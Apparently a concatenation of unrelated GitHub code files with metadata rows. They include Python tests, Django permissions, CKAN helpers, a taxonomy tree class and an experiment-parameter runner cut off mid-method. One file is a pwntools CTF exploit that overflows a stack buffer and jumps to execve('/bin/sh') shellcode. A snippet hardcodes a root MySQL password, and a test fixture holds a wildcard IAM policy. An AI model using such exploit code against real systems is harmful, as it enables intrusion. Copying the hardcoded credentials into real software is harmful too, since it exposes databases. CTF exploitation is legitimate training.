if len(E1content) == 0 or len(E2content) == 0:
messagebox.showinfo("User Input","please fill the data properly")
else:
db_conn = pymysql.connect(host = "localhost",user = "root",password = "library",db = "student")
cursor_s = db_conn.cursor()
cursor_s.execute("insert into studentname(firstname,lastname) values(%s,%s)",(E1content,E2content))
db_conn.commit()
messagebox.showinfo("User Input","data inserted sucessfully")
#print(E1content)
#print(E2content)
B = Button(text = "Submit",command = getcontent)
B.pack()
top.state("zoomed")
top.mainloop() | ArnabBasak/PythonRepository | python code.py | python code.py | py | 983 | python | en | code | 0 | github-code | 50 |
16252026350 | import pytest
from pytest_mock import mocker
from lib.character import Character
from lib.spell import Spell
def test_morgue_filepath():
local_mode = True
character = Character(name="GucciMane", local_mode=local_mode)
expected_filepath = f"/Users/begin/Library/Application Support/Dungeon Crawl Stone Soup/morgue/GucciMane.txt"
assert character.morgue_filepath == expected_filepath
def test_morgue_url():
character = Character(name="GucciMane")
expected_url = "http://crawl.akrasiac.org/rawdata/GucciMane/GucciMane.txt"
assert character.morgue_url == expected_url
def test_spells():
character = Character(name="GucciMane", local_mode=True)
spells = list(character.spells())
assert type(spells[0]) == Spell
def test_spells_above():
character = Character(name="GucciMane", local_mode=True)
spells = character.spells_above(4)
expected_spells = [
"Poison Arrow Conj/Pois #######... 1% 6.0 None",
"Throw Icicle Conj/Ice ######.. 1% 4.0 None",
"Yara's Violent Unravell Hex/Tmut ######.... 4% 5.0 None",
"Invisibility Hex ######.. 14% 6.0 None",
"Metabolic Englaciation Hex/Ice ######.... 17% 5.0 None",
"Alistair's Intoxication Tmut/Pois #####... 24% 5.0 None",
"Petrify Tmut/Erth ####.... 38% 4.0 None",
]
assert spells == expected_spells
def test_morgue_file_from_s3(mocker):
character = Character(name="beginbot")
mocker.patch.object(character, "s3_morgue_file")
expected_morgue_file = "Cool Morgue file"
character.s3_morgue_file.return_value = expected_morgue_file
morgue_file = character.morgue_file()
character.s3_morgue_file.assert_called()
assert morgue_file == expected_morgue_file
def test_morgue_file_from_crawl_server(mocker):
character = Character(name="beginbot")
mocker.patch.object(character, "s3_morgue_file")
mocker.patch.object(character, "fetch_online_morgue")
expected_morgue_file = "Online Morgue"
character.s3_morgue_file.return_value = None
character.fetch_online_morgue.return_value = expected_morgue_file
morgue_file = character.morgue_file()
character.s3_morgue_file.assert_called()
character.fetch_online_morgue.assert_called()
assert morgue_file == expected_morgue_file
def test_spellcasting():
character = Character(morgue_filepath="support/GucciMane.txt", local_mode=True)
assert character.spellcasting() == 3.5
def test_skills():
character = Character(morgue_filepath="support/GucciMane.txt", local_mode=True)
expected_skills = [
" + Level 2.9 Dodging",
" - Level 2.4 Stealth",
" + Level 3.5 Spellcasting",
" + Level 4.6 Conjurations",
]
assert character.skills() == expected_skills
def test_lookup_skill():
character = Character(morgue_filepath="support/GucciMane.txt", local_mode=True)
assert character.lookup_skill("Conjurations").level == 4.6
| davidbegin/morguebot | test/test_character.py | test_character.py | py | 2,942 | python | en | code | 6 | github-code | 50 |
36062014752 | from rest_framework.permissions import BasePermission
class CoursesPermission(BasePermission) :
def has_permission(self, request, view) :
if request.method == 'POST' and request.user.is_superuser == True :
return True
if request.method == 'GET' :
return True
class CoursesByIdPermission(BasePermission) :
def has_permission(self, request, view) :
if request.method == 'PUT' :
if request.user.is_superuser == True or request.user.is_staff == True :
return True
if request.method == 'DELETE' and request.user.is_superuser == True :
return True
if request.method == 'GET' :
return True
| nicole-malaquias/Kanvas | course/permissions.py | permissions.py | py | 811 | python | en | code | 1 | github-code | 50 |
42442587154 | import ckan.model as model
import ckan.logic as logic
from ckan.common import c, _
def get_ksa_helpers():
return dict(
ksa_bit_check=ksa_bit_check,
ksa_group_list = ksa_group_list,
get_ksa_group_img = get_ksa_group_img,
relation_attrs_update=relation_attrs_update,
relations_display=relations_display
)
def ksa_bit_check(mask, pos):
return bool(int(mask or 0) & 1 << pos)
def ksa_group_list():
response = logic.get_action('group_list')({}, {})
return response
def get_ksa_group_img(group):
response = logic.get_action('group_show')({}, {'id': group})
img = response.get('image_url', '')
return img
def relation_attrs_update(data, attrs):
api_url = ''
if data.get('name'):
current_dataset_name = data.get('name')
for attr in attrs:
if attr == 'data-module-source':
if current_dataset_name not in attrs[attr]:
api_url = attrs[attr] + "&except=" + current_dataset_name
if api_url:
attrs['data-module-source'] = api_url
return attrs
return
def relations_display(value):
dataset_list = []
context = {
'model': model,
'session': model.Session,
'user': c.user,
'auth_user_obj': c.userobj
}
if value:
data = value.split(',')
for dataset in data:
# pkg = model.Package.get(dataset)
pkg = logic.get_action('package_show')(context, {'id': dataset})
if pkg:
dataset_list.append(pkg)
return dataset_list
return
| Yesser-GitHub/ckanext-iar | ckanext/ksaiar/helpers.py | helpers.py | py | 1,437 | python | en | code | 0 | github-code | 50 |
15253837283 | #!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./chall_15')
if not args.REMOTE:
p = process(binary.path)
else:
p = remote('chal.2020.sunshinectf.org', 30015)
p.sendline()
p.recvuntil('There\'s a place where nothing seems: ')
_ = p.recvline().strip()
stack = int(_,16)
log.info('stack: ' + hex(stack))
# http://shell-storm.org/shellcode/files/shellcode-905.php
shellcode = b'\x6a\x42\x58\xfe\xc4\x48\x99\x52'
shellcode += b'\x48\xbf\x2f\x62\x69\x6e\x2f\x2f'
shellcode += b'\x73\x68\x57\x54\x5e\x49\x89\xd0'
shellcode += b'\x49\x89\xd2\x0f\x05'
payload = b''
payload += (0x4e - 0x44) * b'A'
payload += p32(0xfacade)
payload += (0x10 - (stack + len(payload)) & 0xf) * b'B'
stack += len(payload)
log.info('stack: ' + hex(stack))
payload += shellcode
payload += (0x4e - len(payload) - 0xc) * b'C'
payload += p32(0xfacade)
payload += (0x4e - len(payload)) * b'D'
payload += p64(stack)
p.sendline(payload)
p.interactive()
| datajerk/ctf-write-ups | sunshinectf2020/speedrun/exploit_15.py | exploit_15.py | py | 953 | python | en | code | 116 | github-code | 50 |
29575496776 | import re
inputs=int(input())
answer=0
for x in range(inputs):
str=input().lower()
if len(re.findall("pink",str))>0 or len(re.findall("rose",str))>0:
answer+=1
if answer==0:
print ('I must watch Star Wars with my daughter')
else:
print(answer) | blueflotsam/Kattis-Solutions | python/fiftyshadesofpink.py | fiftyshadesofpink.py | py | 262 | python | en | code | 0 | github-code | 50 |
8630029592 | # python3
import math
def nums(num1):
length_low=len(str(num1[0]))
length_upper=len(str(num1[1]))
num=[]
z=[]
for a in range(length_low,length_upper+1):
#print(a)
for c in range(1,11-a):
length_low_usage=a
inter=0
for b in range(c,11):
if(length_low_usage==0):
Z=int(inter)
num.append(Z)
#print(inter)
break
inter=inter+b*(10**(length_low_usage-1))
length_low_usage=length_low_usage-1
#print(inter)
#print("Cme to outer for loop")
print(num)
for p in num:
if ((p>=num1[0])and (p<=num1[1])):
z.append(p)
print(z)
if __name__ == '__main__':
#inpu=list(map(int, input("Nums: ").split()))
num1=list(map(int,input("Num: ").split()))
nums(num1)
| bharadwajvaduguru8/leetcode_contests | question.py | question.py | py | 956 | python | en | code | 0 | github-code | 50 |
12418676814 | import scrapy
class StatesSpider(scrapy.Spider):
name = 'states'
allowed_domains = ['www.earthquaketrack.com'] # http/s is prohibited in this list var
start_urls = ['https://www.earthquaketrack.com/p/myanmar/recent']
def parse(self, response):
#rows = response.xpath("(//div[@class='quakes-info-list col col-lg-4 col-sm-6 col-12'])[1]/div/div")
rows = response.xpath("//div[@class='quake-info-container']")
for row in rows:
# xpath selection on the selected object used
# timeago = row.xpath(".//abbr[@class='timeago']/text()").get()
timeago = row.xpath(".//abbr/text()").get() # xpath selection on the selected object
scale = row.xpath(".//span/text()").get()
city = row.xpath(".//a[2]/text()").get()
region = row.xpath(".//a[3]/text()").get()
yield {
#'row': row,
'timeago': timeago,
'scale': scale,
'city': city,
'region': region
}
next_page = response.xpath("//a[@class='next_page']/@href").get()
#next_page_absolute_path = response.urljoin(next_page)
next_page_absolute_path = f"https://www.earthquaketrack.com{next_page}"
#print(next_page)
if next_page_absolute_path:
yield scrapy.Request(url=next_page_absolute_path, callback=self.parse) | thonenyastack/earthquake_scan | spiders/states.py | states.py | py | 1,422 | python | en | code | 0 | github-code | 50 |
11259784429 | import os
import numpy
from kaggle_imgclassif.cassava.data import CassavaDataModule, CassavaDataset
from tests import _ROOT_DATA
PATH_DATA = os.path.join(_ROOT_DATA, "cassava")
def test_dataset(path_data=PATH_DATA):
dataset = CassavaDataset(
path_csv=os.path.join(path_data, "train.csv"),
path_img_dir=os.path.join(path_data, "train_images"),
)
img, lb = dataset[0]
assert isinstance(img, numpy.ndarray)
def test_datamodule(path_data=PATH_DATA):
dm = CassavaDataModule(
path_csv=os.path.join(path_data, "train.csv"),
path_img_dir=os.path.join(path_data, "train_images"),
)
dm.setup()
for imgs, lbs in dm.train_dataloader():
assert len(imgs)
assert len(lbs)
break
| Borda/kaggle_image-classify | tests/cassava/test_data.py | test_data.py | py | 760 | python | en | code | 38 | github-code | 50 |
18677190464 | import pytest
from pycfmodel.model.resources.iam_role import IAMRole
@pytest.fixture()
def iam_role():
return IAMRole(
**{
"Type": "AWS::IAM::Role",
"Properties": {
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Principal": {"Service": ["ec2.amazonaws.com"], "AWS": "arn:aws:iam::111111111111:root"},
"Action": ["sts:AssumeRole"],
},
},
"Path": "/",
"Policies": [
{
"PolicyName": "root",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": {"Effect": "Allow", "Action": "*", "Resource": "*"},
},
}
],
},
}
)
def test_policies(iam_role):
policies = iam_role.Properties.Policies
assert len(policies) == 1
assert policies[0].PolicyName == "root"
| midisfi/pycfmodel | tests/resources/test_iam_role.py | test_iam_role.py | py | 1,149 | python | en | code | null | github-code | 50 |
70978041757 | from os import environ
from os.path import join, dirname
import gzip
import glob
import pandas as pd
from .dataset_modification import (
taxa_to_organism,
)
from .constants import (
RANK_LIST,
ALLOWED_SUPERKINGDOMS,
CANONICAL_RANKS,
ROOT_RANK,
)
NCBI_DELIM = '\t|' # really...
NAMES_ENV_VAR = 'MD2_NCBI_NAMES'
NODES_ENV_VAR = 'MD2_NCBI_NODES'
RANKEDLINEAGE_ENV_VAR = 'MD2_NCBI_RANKEDLINEAGE'
NAMES_DEF = join(dirname(__file__), 'ncbi_tree/names.dmp.gz')
NODES_DEF = join(dirname(__file__), 'ncbi_tree/nodes.dmp.gz')
RANKEDLINEAGE_DEF = join(dirname(__file__), 'ncbi_tree/rankedlineage.dmp.gz')
class TaxonomicRankError(Exception):
pass
class NCBITaxaTree:
def __init__(self, parent_map, names_to_nodes, nodes_to_name):
self.parent_map = parent_map
self.names_to_nodes = names_to_nodes
self.nodes_to_name = nodes_to_name
def _node(self, taxon_name):
return self.names_to_nodes[taxon_name]
def _name(self, node_num):
return self.nodes_to_name[node_num]['name']
def rank(self, taxon_name):
return self.nodes_to_name[self._node(taxon_name)]['rank']
def taxon_id(self, taxon_name):
return self._node(taxon_name)
def parent(self, taxon):
"""Return the name of the parent taxon."""
return self._name(self.parent_map[self._node(taxon)])
def ancestor_rank(self, rank, taxon, default=None):
"""Return the ancestor of taxon at the given rank."""
try:
parent_num = self.parent_map[self._node(taxon)]
while int(parent_num) > 1:
if rank == self.nodes_to_name[parent_num]['rank']:
return self.nodes_to_name[parent_num]['name']
parent_num = self.parent_map[parent_num]
except KeyError:
if default is None:
raise
return default
def ancestors(self, taxon, max_rank=ROOT_RANK):
return self.ancestors_list(taxon, max_rank=max_rank)
def ancestors_list(self, taxon, max_rank=ROOT_RANK):
"""Return a phylogenetically sorted list of ancestors of taxon including taxon."""
max_rank_index = RANK_LIST.index(max_rank)
try:
rank = self.rank(taxon)
taxon_rank_index = RANK_LIST.index(rank)
except ValueError:
raise TaxonomicRankError(f'Requested rank {rank} is not in rank list.')
if taxon_rank_index > max_rank_index:
raise TaxonomicRankError(f'Requested rank {rank} is above {taxon}.')
parent_num = self.parent_map[self._node(taxon)]
parent_rank = self.nodes_to_name[parent_num]['rank']
try:
rank_index = RANK_LIST.index(parent_rank)
except ValueError:
rank_index = -1
ancestor_name_list = [taxon]
while max_rank_index > rank_index:
ancestor_name_list.append(self.nodes_to_name[parent_num]['name'])
if int(parent_num) == 1: # root
break
parent_num = self.parent_map[parent_num]
parent_rank = self.nodes_to_name[parent_num]['rank']
try:
rank_index = RANK_LIST.index(parent_rank)
except ValueError:
rank_index = -1
return ancestor_name_list
def canonical_taxonomy(self, taxon):
"""Return a dict with the canonical (KPCOFGS) taxonomy for a taxon and the taxon id."""
parent_num = self.parent_map[self._node(taxon)]
out = {'taxon_id': self.taxon_id(taxon)}
for ancestor in self.ancestors_list(ROOT_RANK, taxon):
rank = self.rank(ancestor)
if rank in CANONICAL_RANKS:
out[rank] = ancestor
out = {rank: ancestor_rank(rank, taxon)}
return out
def phylum(self, taxon, default=None):
"""Return the phylum for the given taxon."""
return self.ancestor_rank('phylum', taxon, default=default)
def genus(self, taxon, default=None):
"""Return the genus for the given taxon."""
return self.ancestor_rank('genus', taxon, default=default)
def place_microbe(self, taxon):
"""Returns a tuple of (taxonomic id, rank, superkingdom) for the taxon."""
if taxon == 'root':
raise TaxonomicRankError('Cannot give superkingdom for root.')
if self.rank(taxon) in ['subspecies', 'no rank']:
raise TaxonomicRankError(f'Cannot resolve {taxon} at rank {self.rank(taxon)}.')
superkingdom = self.ancestor_rank('superkingdom', taxon)
if superkingdom in ALLOWED_SUPERKINGDOMS:
return self.taxon_id(taxon), self.rank(taxon), superkingdom
raise TaxonomicRankError(f'Superkingdom {superkingdom} not allowed.')
def _tree(self, taxa):
queue, tree = {self._node(el) for el in taxa}, {}
root = None
while len(queue):
cur_node = queue.pop()
parent_node = self.parent_map[cur_node]
if cur_node not in tree:
tree[cur_node] = {'parent': parent_node, 'children': set()}
if not parent_node:
root = cur_node
continue
try:
tree[parent_node]['children'].add(cur_node)
except KeyError:
tree[parent_node] = {
'parent': self.parent_map[parent_node],
'children': set([cur_node])
}
queue.add(parent_node)
return root, tree
def taxa_sort(self, taxa):
"""Return a list with all elements of taxa in DFS order."""
taxa, sort = set(taxa), []
root, tree = self._tree(taxa)
def dfs(node):
for child_node in tree[node]['children']:
child = self._name(child_node)
if child in taxa:
sort.append(child)
dfs(child_node)
dfs(root) # typically 1 is the root node
return sort
def all_names(self):
"""Return a list of all scientific names in the tree. Order not guaranteed."""
return list(self.names_to_nodes.keys())
@classmethod
def parse_files(cls, names_filename=None, nodes_filename=None):
"""Return a tree parsed from the given files."""
names_filename = names_filename if names_filename else environ.get(NAMES_ENV_VAR, NAMES_DEF)
nodes_filename = nodes_filename if nodes_filename else environ.get(NODES_ENV_VAR, NODES_DEF)
with gzip.open(names_filename) as names_file, gzip.open(nodes_filename) as nodes_file:
names_to_nodes, nodes_to_name = {}, {}
sci_name = list()
for line in names_file:
line = line.decode('utf-8')
tkns = [tkn.strip() for tkn in line.strip().split(NCBI_DELIM)]
if len(tkns) >= 3:
if tkns[3] != 'scientific name':
continue
node, name = tkns[:2]
names_to_nodes[name] = node
nodes_to_name[node] = {'name': name, 'rank': None}
sci_name.append(name)
parent_map = {}
for line in nodes_file:
line = line.decode('utf-8')
tkns = [tkn.strip() for tkn in line.strip().split(NCBI_DELIM)]
if len(tkns) >= 4:
node, parent, rank = tkns[:3]
if node.isdigit():
nodes_to_name[node]['rank'] = rank
if node == parent: # NCBI has a self loop at the root
parent = None
parent_map[node] = parent
return cls(parent_map, names_to_nodes, nodes_to_name)
| dcdanko/MD2 | microbe_directory/taxa_tree.py | taxa_tree.py | py | 7,927 | python | en | code | 16 | github-code | 50 |
21119742709 | import numpy as np
import os
import sys
import itertools
import pickle
from typing import MutableMapping
import pandas as pd
from tqdm import tqdm
import string
try:
import ntpath
except ImportError as e:
raise ImportError("Import dependency not met: %s" % e)
import inspect
import errno
# FNA imports
from fna.tools.parameters import ParameterSet
from fna.tools.utils.data_handling import isiterable, import_mod_file
from fna.tools.utils import operations, logger
# add model source path
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../../')
from src.defaults.paths import set_project_paths
from src.utils.system import set_system_parameters
logs = logger.get_logger(__name__)
np.set_printoptions(threshold=sys.maxsize, suppress=True)
def parse_template(template_file, field_dictionary, save_to=None):
"""
Read a template file and replace the provided fields
:param template_file:
:param field_dictionary:
:param save_to:
:return:
"""
res = []
with open(template_file, 'rb') as fp:
tf = fp.readlines()
for line in tf:
new_line = line
for k, v in list(field_dictionary.items()):
new_line = new_line.replace(bytes(k, encoding='utf-8'), bytes(v, encoding='utf-8'))
res.append(new_line)
if save_to:
with open(save_to, 'wb') as fp:
fp.writelines(res)
return res
def replace_experiment_labels(file, system_label=None, project_label=None):
with open(file, 'rb') as fp:
data = fp.readlines()
for idx, line in enumerate(data):
if system_label is not None and b"system_label" in line and line.index(b"system_label") == 0:
data[idx] = "system_label = '{}'\n".format(system_label).encode()
if project_label is not None and b"project_label" in line and line.index(b"project_label") == 0:
data[idx] = "project_label = '{}'\n".format(project_label).encode()
with open(file, 'wb') as fp:
fp.writelines(data)
# ########################################################################################
class ParameterSpace:
"""
A collection of `ParameterSets`, representing multiple points (combinations) in parameter space.
Parses parameter scripts and runs experiments locally or creates job files to be run on a cluster.
Can also harvest stored results from previous experiments and recreate the parameter space for post-profiler.
"""
def __init__(self, initializer, system_label=None, project_label=None, keep_all=False):
"""
Generate ParameterSpace containing a list of all ParameterSets
:param initializer: file url
:param keep_all: store all original parameters (??)
:return: (tuple) param_sets, param_axes, global_label, size of parameter space
"""
assert isinstance(initializer, str), "Filename must be provided"
if system_label is not None or project_label is not None:
replace_experiment_labels(initializer, system_label, project_label)
with open(initializer, 'rb') as fp:
self.parameter_file = fp.readlines()
def validate_parameters_file(module):
"""
Checks for any errors / incompatibilities in the structure of the parameter file. Function
`build_parameters` is required, with or without arguments.
:param module: imported parameter module object
:return:
"""
# TODO anything else?
# build_parameters function must be defined!
if not hasattr(module, "build_parameters"):
raise ValueError("`build_parameters` function is missing!")
# check parameter range and function arguments
range_arguments = inspect.getfullargspec(module.build_parameters)[0]
# logs.info(range_arguments)
if not hasattr(module, "ParameterRange"):
if len(range_arguments) == 0:
return
raise ValueError("`ParameterRange` and arguments of `build_parameters` do not match!")
for arg in range_arguments:
if arg not in module.ParameterRange:
raise ValueError('ParameterRange variable `%s` is not in `ParameterRange` dictionary!' % arg)
if not isiterable(module.ParameterRange[arg]):
raise ValueError('ParameterRange variable `%s` is not iterable! Should be list!' % arg)
def validate_parameter_sets(param_sets):
"""
:param param_sets:
:return:
"""
required_dicts = ["kernel_pars"]#, "encoding_pars", "net_pars"]
for p_set in param_sets:
for d in required_dicts:
if d not in p_set:
raise ValueError("Required parameter (dictionary) `%s` not found!" % d)
# `data_prefix` required
if "data_prefix" not in p_set["kernel_pars"]:
raise ValueError("`data_prefix` missing from `kernel_pars`!")
def parse_parameters_file(url):
"""
:param url:
:return:
"""
module_name, module_obj = import_mod_file(url)
# print(sys.path)
sys.path.pop(-1)
del sys.modules[module_name]
try:
validate_parameters_file(module_obj)
except ValueError as error:
logs.info("Invalid parameter file! Error: %s" % error)
exit(-1)
range_args = inspect.getfullargspec(module_obj.build_parameters)[0] # arg names in build_parameters function
n_ranges = len(range_args)
n_runs = int(np.prod([len(module_obj.ParameterRange[arg]) for arg in range_args])) # nr combinations
param_axes = dict()
param_sets = []
# build cross product of parameter ranges, sorting corresponds to argument ordering in build_parameters
# empty if no range parameters are present: [()]
range_combinations = list(itertools.product(*[module_obj.ParameterRange[arg] for arg in range_args]))
# call build_parameters for each range combination, and pack returned values into a list (set)
# contains a single dictionary if no range parameters
param_ranges = [module_obj.build_parameters(*elem) for elem in range_combinations]
global_label = param_ranges[0]['kernel_pars']['data_prefix']
if n_ranges <= 3:
# verify parameter integrity / completeness
try:
validate_parameter_sets(param_ranges)
except ValueError as error:
logs.info("Invalid parameter file! Error: %s" % error)
# build parameter axes
axe_prefixes = ['x', 'y', 'z']
for range_index in range(n_runs):
params_label = global_label
for axe_index, axe in enumerate(axe_prefixes[:n_ranges]): # limit axes to n_ranges
param_axes[axe + 'label'] = range_args[axe_index]
param_axes[axe + 'ticks'] = module_obj.ParameterRange[param_axes[axe + 'label']]
param_axes[axe + 'ticklabels'] = [str(xx) for xx in param_axes[axe + 'ticks']]
params_label += '_' + range_args[axe_index]
params_label += '=' + str(range_combinations[range_index][axe_index])
p_set = ParameterSet(param_ranges[range_index], label=params_label)
if not keep_all:
p_set = p_set.clean(termination='pars')
p_set.update({'label': params_label})
param_sets.append(p_set)
else:
# verify parameter integrity / completeness
try:
validate_parameter_sets(param_ranges)
except ValueError as error:
logs.info("Invalid parameter file! Error: %s" % error)
# build parameter axes
axe_prefixes = [a for a in string.ascii_letters][:n_ranges]
for range_index in range(n_runs):
params_label = global_label
for axe_index, axe in enumerate(axe_prefixes[:n_ranges]): # limit axes to n_ranges
param_axes[axe + 'label'] = range_args[axe_index]
param_axes[axe + 'ticks'] = module_obj.ParameterRange[param_axes[axe + 'label']]
param_axes[axe + 'ticklabels'] = [str(xx) for xx in param_axes[axe + 'ticks']]
params_label += '_' + range_args[axe_index]
params_label += '=' + str(range_combinations[range_index][axe_index])
p_set = ParameterSet(param_ranges[range_index], label=params_label)
if not keep_all:
p_set = p_set.clean(termination='pars')
p_set.update({'label': params_label})
param_sets.append(p_set)
return param_sets, param_axes, global_label, n_ranges, module_obj.ParameterRange
def parse_parameters_dict(url):
"""
Simple parser for dictionary (text) parameter scripts, not .py!
:param url:
:return:
"""
param_set = ParameterSet(url)
try:
validate_parameter_sets([param_set])
except ValueError as error:
logs.info("Invalid parameter file! Error: %s" % error)
param_axes = {}
label = param_set.kernel_pars["data_prefix"]
dim = 1
return [param_set], param_axes, label, dim, {}
if initializer.endswith(".py"):
self.parameter_sets, self.parameter_axes, self.label, self.dimensions, self.parameter_ranges = \
parse_parameters_file(initializer)
else:
self.parameter_sets, self.parameter_axes, self.label, self.dimensions, self.parameter_ranges = \
parse_parameters_dict(initializer)
def update_run_parameters(self, system_label=None, project_label=None): #, system_params=None):
"""
Update run type and experiments specific paths in case a system_label template is specified.
:param project_label:
:param system_label: name of system_label template, e.g., Blaustein
:return:
"""
paths = set_project_paths(system=system_label, project_label=project_label)
# if system_params is None:
# system_params = set_system_parameters(cluster=system_label)
# kernel_pars = set_kernel_defaults(resolution=0.1, run_type=system_label, data_label='',
# data_paths=paths, **system_params)
if system_label is not None and system_label != "local":
assert system_label in paths.keys(), "Default setting for cluster {0} not found!".format(system_label)
for param_set in self.parameter_sets:
param_set.kernel_pars['data_path'] = paths[system_label]['data_path']
param_set.kernel_pars['mpl_path'] = paths[system_label]['matplotlib_rc']
param_set.kernel_pars['print_time'] = False
param_set.kernel_pars.system.local = False
param_set.kernel_pars.system.system_label = system_label
param_set.kernel_pars.system.jdf_template = paths[system_label]['jdf_template']
param_set.kernel_pars.system.remote_directory = paths[system_label]['remote_directory']
param_set.kernel_pars.system.queueing_system = paths[system_label]['queueing_system']
# param_set.kernel_pars.system.jdf_fields = kernel_pars.system.jdf_fields
else:
for param_set in self.parameter_sets:
param_set.kernel_pars['data_path'] = paths[system_label]['data_path']
param_set.kernel_pars['mpl_path'] = paths[system_label]['matplotlib_rc']
param_set.kernel_pars['print_time'] = True
param_set.kernel_pars.system.local = True
param_set.kernel_pars.system.system_label = system_label
param_set.kernel_pars.system.jdf_template = paths[system_label]['jdf_template']
param_set.kernel_pars.system.remote_directory = paths[system_label]['remote_directory']
param_set.kernel_pars.system.queueing_system = paths[system_label]['queueing_system']
def iter_sets(self):
"""
An iterator which yields the ParameterSets in ParameterSpace
"""
for val in self.parameter_sets:
yield val
def __eq__(self, other):
"""
For testing purposes
:param other:
:return:
"""
if not isinstance(other, self.__class__):
return False
for key in self.parameter_axes:
if key not in other.parameter_axes:
return False
else:
if isinstance(self.parameter_axes[key], np.ndarray):
if not np.array_equal(self.parameter_axes[key], other.parameter_axes[key]):
return False
elif self.parameter_axes[key] != other.parameter_axes[key]:
return False
if self.label != other.label or self.dimensions != other.dimensions:
return False
return self.parameter_sets == other.parameter_sets
def __getitem__(self, item):
return self.parameter_sets[item]
def __len__(self):
return len(self.parameter_sets)
def save(self, target_full_path):
"""
Save the full ParameterSpace by re-writing the parameter file
:return:
"""
with open(target_full_path, 'wb') as fp:
fp.writelines(self.parameter_file)
def compare_sets(self, parameter):
"""
Determine whether a given parameter is common to all parameter sets
:param parameter: parameter to compare
"""
common = dict(pair for pair in self.parameter_sets[0].items() if all((pair in d.items() for d in
self.parameter_sets[1:])))
result = False
if parameter in common.keys():
result = True
else:
for k, v in common.items():
if isinstance(v, dict):
if parameter in v.keys():
result = True
return result
def run(self, computation_function, project_dir=None, **parameters):
"""
Run a computation on all the parameters
:param computation_function: function to execute
:param parameters: kwarg arguments for the function
"""
system = self.parameter_sets[0].kernel_pars.system
if system['local']:
logs.info("Running {0} serially on {1} Parameter Sets".format(
str(computation_function.__module__.split('.')[1]), str(len(self))))
results = None
for par_set in self.parameter_sets:
logs.info("\n- Parameters: {0}".format(str(par_set.label)))
results = computation_function(par_set, **parameters)
return results
else:
logs.info("Preparing job description files...")
export_folder = system['remote_directory']
main_experiment_folder = export_folder + '{0}/'.format(self.label)
try:
os.makedirs(main_experiment_folder)
except OSError as err:
if err.errno == errno.EEXIST and os.path.isdir(main_experiment_folder):
logs.info("Path `{0}` already exists, will be overwritten!".format(main_experiment_folder))
else:
raise OSError(err.errno, "Could not create exported experiments folder.", main_experiment_folder)
remote_run_folder = export_folder + self.label + '/'
project_dir = os.path.abspath(project_dir)
network_dir = os.path.abspath(project_dir + '/../')
py_file_common_header = ("import sys\nsys.path.append('{0}')\nsys.path.append('{1}')\nimport matplotlib"
"\nmatplotlib.use('Agg')\nfrom fna.tools.parameters import *\nfrom "
"fna.tools.analysis import *\nfrom experiments import {2}\n\n") \
.format(project_dir, network_dir, computation_function.__module__.split('.')[1])
write_to_submit = []
job_list = main_experiment_folder + 'job_list.txt'
for par_set in self.parameter_sets:
system2 = par_set.kernel_pars.system
template_file = system2['jdf_template']
queueing_system = system2['queueing_system']
exec_file_name = remote_run_folder + par_set.label + '.sh'
local_exec_file = main_experiment_folder + par_set.label + '.sh'
computation_file = main_experiment_folder + par_set.label + '.py'
remote_computation_file = remote_run_folder + par_set.label + '.py'
par_set.save(main_experiment_folder + par_set.label + '.txt')
with open(computation_file, 'w') as fp:
fp.write(py_file_common_header)
fp.write(computation_function.__module__.split('.')[1] + '.' + computation_function.__name__ +
"({0}, **{1})".format("'./" + par_set.label + ".txt'", str(parameters)))
system2['jdf_fields'].update({'{{ computation_script }}': remote_computation_file,
'{{ script_folder }}': remote_run_folder})
# print(system2)
parse_template(template_file, system2['jdf_fields'].as_dict(), save_to=local_exec_file)
write_to_submit.append("{0}\n".format(exec_file_name))
with open(job_list, 'w') as fp:
fp.writelines(write_to_submit)
def print_stored_keys(self, data_path):
"""
Print all the nested keys in the results dictionaries for the current data set
:param data_path: location of "Results" folder
:return:
"""
def pretty(d, indent=1):
if isinstance(d, dict):
indent += 1
for key, value in d.items():
print('-' * indent + ' ' + str(key))
if isinstance(value, dict):
pretty(value, indent + 1)
pars_labels = [n.label for n in self]
# open example data
ctr = 0
found_ = False
while ctr < len(pars_labels) and not found_:
try:
with open(data_path + pars_labels[ctr], 'rb') as fp:
results = pickle.load(fp)
print("Loading ParameterSet {0}".format(self.label))
found_ = True
except:
print("Dataset {0} Not Found, skipping".format(pars_labels[ctr]))
ctr += 1
continue
print("\n\nResults dictionary structure:\n- Root")
pretty(results)
def get_stored_keys(self, data_path):
"""
Get a nested list of dictionary keys in the results dictionaries
:return:
"""
def extract_keys(d):
for k, v in d.items():
if isinstance(v, dict):
for x in extract_keys(v):
yield "{}/{}".format(k, x)
else:
yield k
pars_labels = [n.label for n in self]
# open example data
ctr = 0
found_ = False
while ctr < len(pars_labels) and not found_:
try:
with open(data_path + pars_labels[ctr], 'rb') as fp:
results = pickle.load(fp)
print("Loading ParameterSet {0}".format(self.label))
found_ = True
except:
print("Dataset {0} Not Found, skipping".format(pars_labels[ctr]))
ctr += 1
continue
return [k for k in extract_keys(results)]
def harvest(self, data_path, key_set=None, operation=None, verbose=True):
"""
Gather stored results data and populate the space spanned by the Parameters with the corresponding results
:param data_path: full path to global data folder
:param key_set: specific result to extract from each results dictionary (nested keys should be specified as
'key1/key2/...'
:param operation: function to apply to result, if any
:return: (parameter_labels, results_array)
"""
if self.parameter_axes:# and self.dimensions <= 3:
# pars_path = data_path[:-8]+"ParameterSpace.py"
# module_name, module_obj = import_mod_file(pars_path)
# sys.path.pop(-1)
# del sys.modules[module_name]
# range_args = inspect.getfullargspec(module_obj.build_parameters)[0]
# range_combinations = list(itertools.product(*[module_obj.ParameterRange[arg] for arg in range_args]))
if self.dimensions <= 3:
l = ['x', 'y', 'z']
else:
l = [a for a in string.ascii_letters][:self.dimensions]
domain_lens = [len(self.parameter_axes[l[idx] + 'ticks']) for idx in range(self.dimensions)]
domain_values = [self.parameter_axes[l[idx] + 'ticks'] for idx in range(self.dimensions)]
var_names = [self.parameter_axes[l[idx] + 'label'] for idx in range(self.dimensions)]
dom_len = np.prod(domain_lens)
results_array = np.empty(tuple(domain_lens), dtype=object)
parameters_array = np.empty(tuple(domain_lens), dtype=object)
assert len(self) == dom_len, "Domain length inconsistent"
pars_labels = [n.label for n in self]
for n in tqdm(range(int(dom_len)), desc="Loading datasets", total=int(dom_len)):
params_label = self.label
index = []
# for axe_index, axe in enumerate(l[:self.dimensions]):
# params_label += '_' + range_args[axe_index]
# params_label += '=' + str(range_combinations[range_index][axe_index])
